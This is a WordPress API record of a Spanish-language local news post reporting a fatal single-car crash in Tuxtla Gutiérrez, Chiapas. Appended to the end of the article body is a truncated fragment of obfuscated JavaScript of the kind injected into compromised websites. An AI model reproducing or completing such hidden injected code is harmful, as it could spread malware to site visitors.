{"id":17376,"date":"2024-08-20T03:27:03","date_gmt":"2024-08-20T03:27:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17376"},"modified":"2024-08-20T03:27:04","modified_gmt":"2024-08-20T03:27:04","slug":"muere-conductor-de-vw-en-el-libramiento-sur-se-estrello-contra-un-poste","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17376","title":{"rendered":"Muere conductor de Vw en el Libramiento Sur, se estrell\u00f3 contra un poste"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"17377\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124321283-1024x768.jpg\" alt=\"\" class=\"wp-image-17377\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124321283-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124321283-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124321283-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124321283.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"17378\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124323411-1024x768.jpg\" alt=\"\" class=\"wp-image-17378\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124323411-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124323411-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124323411-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124323411.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"17379\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124318712-1024x768.jpg\" alt=\"\" class=\"wp-image-17379\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124318712-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124318712-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124318712-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724124318712.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 19 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Cerca de la media noche de este domingo el conductor de un Vw Sed\u00e1n de color gris perdi\u00f3 la vida luego de estrellarse contra un poste de metal y salir volando unos 20 metros.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el sujeto de unos 45 a\u00f1os de edad, conduc\u00eda a exceso de velocidad en el carril de Oriente a Poniente cuando en una curva perdi\u00f3 el control y se estrell\u00f3 contra el poste de alumbrado p\u00fablico.<\/p>\n\n\n\n<p>Por el fuerte golpe el poste se cay\u00f3 y el vocho qued\u00f3 desecho.<\/p>\n\n\n\n<p>Al sujeto qued\u00f3 tirado metros adelante.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil Municipal y Estatales y despu\u00e9s de una revisi\u00f3n determinaron que ya hab\u00eda muerto.<\/p>\n\n\n\n<p>Peritos de la Fiscal\u00eda General del Estado, realizaron las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\n\n\n<p>Hasta el momento se desconoce la identidad del occiso.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 19 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Cerca de la media noche de este domingo el conductor de un Vw Sed\u00e1n de color gris perdi\u00f3 la vida luego de estrellarse contra un poste de metal y salir volando unos 20 metros. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17377,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-17376","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17376","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17376"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17376\/revisions"}],"predecessor-version":[{"id":17380,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17376\/revisions\/17380"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17377"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17376"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17376"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17376"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}